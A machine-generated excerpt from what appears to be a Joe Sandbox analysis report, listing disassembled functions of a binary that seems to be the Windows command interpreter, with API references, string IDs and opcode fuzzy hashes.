                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DefaultUser
                                        • String ID:
                                        • API String ID: 3358694519-0
                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                        • Instruction ID: 86b24a08f6114743cff31c529974209a3cac3da26f3b4ea312e94688334b88ee
                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                        • Instruction Fuzzy Hash: 2CE0C2E2F0C2638AF5543F8364457B4999BCB787B2FD44031CF2D012CA692DAA415229
                                        Function 00007FF7CD498D30 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: __getmainargs
                                        • String ID:
                                        • API String ID: 3565562838-0
                                        • Opcode ID: b6f5cdf5722783bf56140b72c494151407bd75dd9d900e70dce4adf5245e8247
                                        • Instruction ID: 0d80ff798e6b60c4d071210c2c7db776b56b113a4a1a0a17445268a65ea0ecee
                                        • Opcode Fuzzy Hash: b6f5cdf5722783bf56140b72c494151407bd75dd9d900e70dce4adf5245e8247
                                        • Instruction Fuzzy Hash: B7E04C75B0CE87A5EA08AF90E9404A0B760AB34324BC051F1CE6E52224EF3CA356CB20
                                        Function 00007FF7CD492E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                        • Instruction ID: 042905ca52286c0116e85e5b7364156340eb70640ca9f18893b4851a26261b8e
                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                        • Instruction Fuzzy Hash: A8F0B421B0D78140EE54AF57B58012A92959B4CBF0B888334EF7C47BC9EE3CD5518300

                                        Non-executed Functions

                                        Function 00007FF7CD485B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                        • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                        • API String ID: 1388555566-2647954630
                                        • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                        • Instruction ID: 892879dbaff06a1fb6f97af9d2b0d4c35c49dbcaf40a81ff23316af04eacf1dc
                                        • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                        • Instruction Fuzzy Hash: 58A28231B0CB8286EB10AF65A8141B9B7A2FB497A4F848135DF2E47795FF3CE6448710
                                        Function 00007FF7CD48E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                        • String ID: &<|>$+: $:$:EOF$=,;$^
                                        • API String ID: 511550188-726566285
                                        • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                        • Instruction ID: d5a1f9d1d850b8cc7c6cfbd9aa183ccb4ae9c9dde1e1838d2f1a179e3ec8e819
                                        • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                        • Instruction Fuzzy Hash: BF52C122F0C69286EB24AF169804679FAA1FB857A4FC44135DF6E47794FF3DE6408720
                                        Function 00007FF7CD489E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmp$wcschr$wcstol
                                        • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                        • API String ID: 1738779099-3004636944
                                        • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                        • Instruction ID: 91402212a3ae88cf31f84014292e88cd3cc3ae96e2155215725611ac6ccbc0f7
                                        • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                        • Instruction Fuzzy Hash: 11728232F0C74286EB10AFA598456BDB7A1BB54BA8F804035CF2D97794FE7CA655C320
                                        Function 00007FF7CD4A7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F44
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A7F5C
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F9E
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7FFF
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8020
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8036
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8061
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8075
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A80D6
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A80EA
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8177
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A819A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81BD
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81DC
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81FB
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A821A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8239
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8291
                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82D7
                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82FB
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A831A
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8364
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8378
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A839A
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83AE
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83E6
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8403
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8418
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                        • API String ID: 3637805771-3100821235
                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction ID: cfbe3cc7852aa30d2df3946e539973b2af21d86a31baaf239b726bb3d2dacccd
                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction Fuzzy Hash: 1DE18631B0CA529AE710AF66E404179FBA1FB59BA5B849134CF2E53790FF3DA605C720
                                        Function 00007FF7CD483F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                        • String ID: %s$%s
                                        • API String ID: 3623545644-3518022669
                                        • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                        • Instruction ID: d0b563bb9cc306e0e4df485a7d25c962b1382668511b756263e32e99a4ac6482
                                        • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                        • Instruction Fuzzy Hash: A5D2B631B0C6428AEB64AF6598406BDF7A1FB857A4F840139DF6E47A94EF3CE604C710
                                        Function 00007FF7CD482C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                        • String ID: %9d$%s
                                        • API String ID: 4286035211-3662383364
                                        • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                        • Instruction ID: 5bf4b2b86bce17d52584448d4c903f78c3f3c64a10c571d69ac78ca714443a69
                                        • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                        • Instruction Fuzzy Hash: B352A532B0CA818AEB64AF65D8542F9B7A1FB457A9F804131DF2E47798EF3CD6448710
                                        Function 00007FF7CD4918D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcsrchr$towlower
                                        • String ID: fdpnxsatz
                                        • API String ID: 3267374428-1106894203
                                        • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                        • Instruction ID: 28d6c80193d3cc28af7abec75f3b1f14f3632b9bdd7be6a35c6cdd868e58a36c
                                        • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                        • Instruction Fuzzy Hash: 5E42C521B0CA82C5EB64AF6695046B9A7A6FF45BA4F844136DF2E077C4FF3CE6418710
                                        Function 00007FF7CD487650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                        • String ID: DPATH
                                        • API String ID: 95024817-2010427443
                                        • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction ID: 62e4c871c5ab285b35346810f93ffdcaa57cc52ed22cd8cd89e60beb153362e9
                                        • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction Fuzzy Hash: 2B128432B0C68286E764AF15A44417DF6A1FB897A4F845139EF6E57794EF3CEA00CB10
                                        Function 00007FF7CD485240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: [...]$ [..]$ [.]$...$:
                                        • API String ID: 0-1980097535
                                        • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                        • Instruction ID: fb5f13cd704cbfc11ff92ddfb004e6f7f675543f1566ed1e103ea8ba7d5b5265
                                        • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                        • Instruction Fuzzy Hash: B1328F72B0CA8286EB60EF61A8442F9B3A5EB457A8F804135DF2D47695FF3CD645C720
                                        Function 00007FF7CD486EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 1795611712-3662956551
                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction ID: c4ffb43a4dd708b072ce748a150b20da4085b9160fc97b799ab9da3276c8643d
                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction Fuzzy Hash: 60E1B022B0C64296E710BF65A8405BDE6A1BB897A4FD44136DF2E57695FF3CE604C320
                                        Function 00007FF7CD4AEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsupr.MSVCRT ref: 00007FF7CD4AEF33
                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEF98
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFA9
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFBF
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD4AEFDC
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFED
